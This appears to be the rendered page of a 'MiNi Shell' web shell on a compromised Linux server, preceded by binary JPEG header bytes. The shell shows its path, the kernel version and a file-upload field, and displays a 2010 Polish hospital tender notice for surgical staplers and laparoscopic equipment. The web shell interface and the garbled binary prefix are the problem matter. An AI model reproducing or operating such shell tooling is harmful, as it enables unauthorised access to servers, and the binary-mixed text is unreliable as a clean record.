JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/44551-N-2010.html

<p class="kh_header"><b>Ełk: Przetarg nieograniczony o wartości poniżej 193 000 euro na: dostawę  sprzętu sprzętu jednorazowego do zabiegów chirurgicznych</b><br>
<b>Numer ogłoszenia: 44551 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Pro-Medica" w Ełku Sp. z o.o. , ul. Baranki 24, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 621 96 50, faks 087 621 96 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.promedica.elk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pro-Medica Sp. z o.o. w Ełku.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony o wartości poniżej 193 000 euro na: dostawę  sprzętu sprzętu jednorazowego do zabiegów chirurgicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Ilość szt.
Pakiet 1		
1	stapler okrężny, zagięty , jednorazowy, średnicy 25 mm (plus minus 1 mm) z łamanym kowadełkiem, dwa rzędy tytanowych zszywek spłaszczonych dwustronnie, wysokośc zszywki przed zamknięciem 4,8 mm	6
2	stapler okrężny, zagięty , jednorazowy, średnicy 28 mm (plus minus 1 mm) z łamanym kowadełkiem, dwa rzędy tytanowych zszywek spłaszczonych dwustronnie, wysokość zszywki przed zamknięciem 4,8 mm	6
3	stapler okrężny, zagięty , jednorazowy, średnicy 31 mm (plus minus 1 mm) z łamanym kowadełkiem, dwa rzędy tytanowych zszywek spłaszczonych dwustronnie, wysokośc zszywki przed zamknięciem 4,8 mm	12
4	stapler okrężny, zagięty , jednorazowy, średnicy 33 mm (plus minus 1 mm) z łamanym kowadełkiem, dwa rzędy tytanowych zszywek spłaszczonych dwustronnie, wysokośc zszywki przed zamknięciem 4,8 mm	12
Pakiet 2		
1	Zestaw do chirurgicznego leczenia otyłości składający sie z = opaska bariatryczna typu niskociśnieniowego,wzmacniana siatką darkonową, regulowana,z miękkiego silikonu, dł, 11cm, pojemność balonu 9ml, fabrycznie anatomicznie ukształtowana z systemem mechanicznego aplikatora portu do powięzi z czterema wysuwanymi hakami,dająca port niskoprofilowy nie przekraczający 13,2 mm oraz mechanizm szybkiego zamknięcia, zapewniająca restrykcję tkanki na całym obwodzie po zamknięciu 360 stopni,sterylna	10
2	Urządzenie manipulator typu goldfinger 5mm śr. służące do mocowania opaski bariatrycznej, jednorazowe,sterylne	2
Pakiet 3		
1	stapler liniowy do kilkukrotnego użytku przy jednym zabiegu, wykonujacy szew 60 mm długosci z podwójną linią obustronnie spłaszczonych zszywek, przyjmujących po zamknięciu kształt litery B = 6 szt   	6
2	ładunki do ww staplera, wysokość zszywki po zamknięciu 2mm	12
3	ładunki do ww staplera, wysokość zszywki po zamknięciu 1,5 mm	18
Pakiet 4		
1	Endoskopowy stapler tnący z wbudowanym nożem, do ładunków 45 mm długości,  długość 44 cm (plus minus 2 cm), 2 x 3 linie zszywek tytanowych, przechodzący przez troakar 12 mm, posiadający wskaźnik wystrzału ładunku, posiadający możliwość ręcznego wycofania noża, jednorazowy, możliwość wykonania min. 10 strzałów przy zabiegu	20
2	ładunki do staplera jw. , 45 mm dł ładunku, wysokość zszywki po zamknięciu 1,5 mm	30
3	Endoskopowy stapler tnący z wbudowanym nożem, do ładunków długości 60 mm, z możliwością zginania ramienia staplera do 45 stopni , długość 44 cm (plus minus 2 cm), 2 x 3 linie zszywek tytanowych, przechodzący przez troakar 12 mm, posiadający wskaźnik wystrzału ładunku wbudowany w boczną część korpusu staplera, posiadający możliwość ręcznego wycofania noża, jednorazowy, możliwość wykonania min. 10 strzałów przy zabiegu	20
4	Endoskopowy stapler tnący z wbudowanym nożem, do ładunków długości 60 mm, z    możliwością zginania ramienia staplera do 45 stopni , długość 34 cm (plus minus 1 cm), 2 x 3 linie zszywek tytanowych, przechodzący przez troakar 12 mm, posiadający wskaźnik wystrzału ładunku wbudowany w boczną część korpusu staplera, posiadający możliwość ręcznego wycofania noża, jednorazowy, możliwość wykonania min. 10 strzałów przy zabiegu	60
5	ładunki do staplera jw. 60 mm dł ładunku, wysokość zszywki po zamknięciu 2 mm	80
6	ładunki do staplera jw. 60 mm dł ładunku, wysokość zszywki po zamknięciu 1,5 mm	180
7	ładunki do staplera jw. 60 mm dł ładunku, wysokość zszywki po zamknięciu 1,8 mm	150
Pakiet 5 		
1	Sterylny zestaw do operacji laparoskopowych składający się z = 1. kaniula  trokara bezostrzowego z bocznymi separatorami tkankowymi, przeźroczysta,żebrowana,niegwintowana,z uniwersalną redukcją i kranikiem insuflacyjnym , 11 mm  śr, 100 mm dł- 2 szt  2. kaniula trokara bezostrzowego z bocznymi separatorami tkankowymi, przeźroczysta, żebrowana,niegwintowana,z kranikiem insuflacyjnym, 5 mm śr, 75 mm dł- 2 szt  3. klipsy tytanowe, poprzecznie i podłużnie rowkowane, dł. średnia, 6 sztuk 4. igła Verresa 120 mm dł          30 zestawów 5. obturator przeznaczony do troakara 11 mm=1 szt  6. obturator przeznaczony do ww troakara 5 mm= 1 szt 	30

Pakiet 6		
1	zestaw do zabiegów laparoskopowych przez jeden otwór, składający się z jednego portu elastycznego z termoplastycznego elastomeru, z zaworem do insuflacji i trzema 5 mm małymi trokarami i obturatorem	18
2	narzędzie laparoskopowe, jednorazowe, preparacyjne 5 mm , z możliwością zgiecia końcówki roboczej do 80 st, z możliwością obrotu 360 st, z możliwościa podłączenia diatermii  jednobiegunowej, ramię 31 cm ( plus  minus 1 cm), z blokadą zacisku 	6
3	narzędzie laparoskopowe, jednorazowe, chwytne, typu grasper,  5 mm , z możliwością zgięcia końcówki roboczej do 80 st, z możliwością obrotu 360 st,  ramię 31 cm ( plu  minus 1 cm), z blokadą zacisku	6
4	klipsownica laparoskopowa 5 mm z ładunkiem min. 18 klipsów ,klipsy 9 mm , długość klipsownicy 37 cm (plus minus 2 cm)     	6
Pakiet 7		
1	pokrywa uszczelniająca dostępu laparoskopowego  uniwersalna do metody hand assist przy operacjach jelita grubego 	2
2	silikonowy port dostępu laparoskopowego do powłoki 4-7 cm, kompatybilny z pokrywą jw	6
3	Stapler liniowy tnący, o zakrzywionym kształcie głowicy,linia cięcia 40mm,zewnętrzna linia szycia 48mm,wewnętrzna linia szycia 42mm,mieszczący się w przestrzeni 30mm,do dolnej przedniej resekcji odbytnicy, wysokość zszywki po zamknięciu 1,5 mm	4
4	Stapler liniowy tnący, o zakrzywionym kształcie głowicy,linia cięcia 40mm,zewnętrzna linia szycia 48mm,wewn. Linia szycia 42mm, mieszczący się w przestrzeni 30mm, do dolnej przedniej resekcji odbytnicy,wysokość zszywki po zamknięciu 2 mm	6
5	ładunki do staplera jw (1,5 mm)	8
6	ładunki do staplera jw (2 mm) 	10
Pakiet 8		
1	klipsy tytanowe do klipsownicy 10 mm , przystosowane do klipsownicy Ethicon LC, sterylne wkłady po 6 sztuk, 8 mm długości (plus minus 1 mm) 	40
2	klipsy tytanowe do klipsownicy 10 mm , przystosowane do klipsownicy Ethicon LC, sterylne wkłady po 6 sztuk, 12 mm długości (plus minus 1 mm)	10
3	klipsy z polimeru polidioksanonowego (PDS) do blokowania nici chirurgicznych 2 0 i 3 0, przystosowane do klipsownicy Ethicon, z zatrzaskiem, w magazynku po 2 sztuki = 50 szt	50
Pakiet 9 		
1	laparoskopowy pojemnik do bezkontaktowego usuwania tkanek, 10 mm, poj. od 250 ml z możliwością wejścia przez trokar o średnicy 10 mm	20.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7, 33.14.11.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia przez Wykonawcę wadium: 																
																
Pakiet 1 -  1500  zł ( słownie: tysiąc pięćset  złotych 00/100)																
Pakiet 2 -  1200  zł ( słownie: tysiąc dwieście  złotych 00/100)																
Pakiet 3 -    500  zł ( słownie: pięćset  złotych 00/100)																
Pakiet 4 -  7200 zł ( słownie: siedem tysięcy dwieście złotych 00/100)																
Pakiet 5 -    200 zł ( słownie: dwieście złotych 00/100)																
Pakiet 6 -    800 zł ( słownie: osiemset złotych 00/100)																
Pakiet 7 -    600 zł ( słownie: sześćset złotych 00/100)																
Pakiet 8 -    300 zł ( słownie: trzysta złotych 00/100)																
Pakiet 9 -    150 zł ( słownie: sto pięćdziesiąt złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie																
a)  oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie																
a) oświadczenie  Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych; 																
b) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie 																
a) Oświadczenie Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena zostanie dokonana według formuły: spełnia/nie spełnia, na podstawie 																
a) Oświadczenie Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Katalog lub kopie tych stron katalogu lub inne materiały firmowe, na których będą zawarte wyczerpujące informacje dotyczące oferowanego sprzętu.  
2) Dokumenty potwierdzające dopuszczenie produktu do obrotu na terytorium RP. tj.
a) Deklaracja Zgodności producenta (dotyczy wszystkich klas wyrobu  medycznego)
b) Certyfikat CE jednostki notyfikowanej (dotyczy klasy wyrobu medycznego: I sterylna, I z funkcją pomiarową, IIa, IIb, III).
c) Wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i II a pod warunkiem, że pierwsze jego wprowadzenie nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.4.2004 r. o Wyrobach Medycznych - w takim wypadku załączyć stosowne oświadczenie).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres 30 dni od dnia, w którym upływa termin składania ofert.																
2) Podpisany wzór umowy przez Osoby Uprawnione zgodnie ze wskazaniami o których mowa w § XIV SIWZ.																
3) Uzupełniony formularz cenowy oferty (załącznik nr 1 do SIWZ); wszystkie ceny powinny być poddane w złotych polskich. Sposób obliczania: Cena jedn. netto x Ilość = wartość netto + Vat = wartość brutto. Podsumowane wartości netto i brutto pakietu.																
4) Uzupełniony załącznik nr 3 do SIWZ.																
5)Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.promedica.elk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pro Medica w Ełku Sp. z o.o., ul. Baranki 24, 19-300 Ełk,  pokój 027/A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 10:30, miejsce: Pro Medica w Ełku Sp. z o.o., ul. Baranki 24, 19-300 Ełk ; Sekretariat , pok 504.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4 pozycje - staplery okrężne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do chirurgicznego leczenia otyłości składający sie z = opaska bariatryczna typu niskociśnieniowego,wzmacniana siatką darkonową, regulowana,z miękkiego silikonu, dł, 11cm, pojemność balonu 9ml, fabrycznie anatomicznie ukształtowana z systemem mechanicznego aplikatora portu do powięzi z czterema wysuwanymi hakami,dająca port niskoprofilowy nie przekraczający 13,2 mm oraz mechanizm szybkiego zamknięcia, zapewniająca restrykcję tkanki na całym obwodzie po zamknięciu 360 stopni,sterylna	10
Urządzenie manipulator typu goldfinger 5mm śr. służące do mocowania opaski bariatrycznej, jednorazowe,sterylne	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> stapler liniowy do kilkukrotnego użytku przy jednym zabiegu, wykonujacy szew 60 mm długosci z podwójną linią obustronnie spłaszczonych zszywek, przyjmujących po zamknięciu kształt litery B = 6 szt   	6
ładunki do ww staplera, wysokość zszywki po zamknięciu 2mm	12
ładunki do ww staplera, wysokość zszywki po zamknięciu 1,5 mm	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
